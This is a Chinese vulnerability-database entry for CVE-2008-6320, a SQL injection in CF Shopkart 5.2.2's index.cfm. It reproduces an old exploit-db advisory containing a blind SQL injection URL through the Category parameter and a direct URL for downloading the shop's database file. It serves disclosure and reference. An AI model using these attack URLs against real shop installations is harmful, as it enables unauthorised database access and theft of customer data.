CF Shopkart cf_shopkart 'index.cfm'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116996 漏洞类型 SQL注入
发布时间 2008-12-10 更新时间 2009-02-27
CVE编号 CVE-2008-6320 CNNVD-ID CNNVD-200902-637
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7412
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-637
|漏洞详情
Shopkart是一个基于免费的电子商务解决方案。CFShopkart5.2.2版本的index.cfm中存在SQL注入漏洞。远程攻击者可以借助一个ViewCategory操作中的Category参数,执行任意SQL指令。
|漏洞EXP
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CF SHOPKART V5.2.2
#download : http://www.cfshopkart.com/dl/cfshopkart522.rar
#Demo     : http://www.cfshopkart.com/demos/cfshopkart522/

###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--
http://www.cfshopkart.com/demos/cfshopkart522/index.cfm?carttoken=86347665727815&Action=ViewCategory&Category=(bl!nd)


--=[DATABASE DISCLOSURE]=--
http://www.cfshopkart.com/demos/cfshopkart522/databases/cfshopkart52.mdb

#Greetz For DraGoBalti`

###########################################################################

# milw0rm.com [2008-12-10]
|参考资料

来源:BID
名称:32765
链接:http://www.securityfocus.com/bid/32765
来源:MILW0RM
名称:7412
链接:http://www.milw0rm.com/exploits/7412
来源:SECUNIA
名称:33080
链接:http://secunia.com/advisories/33080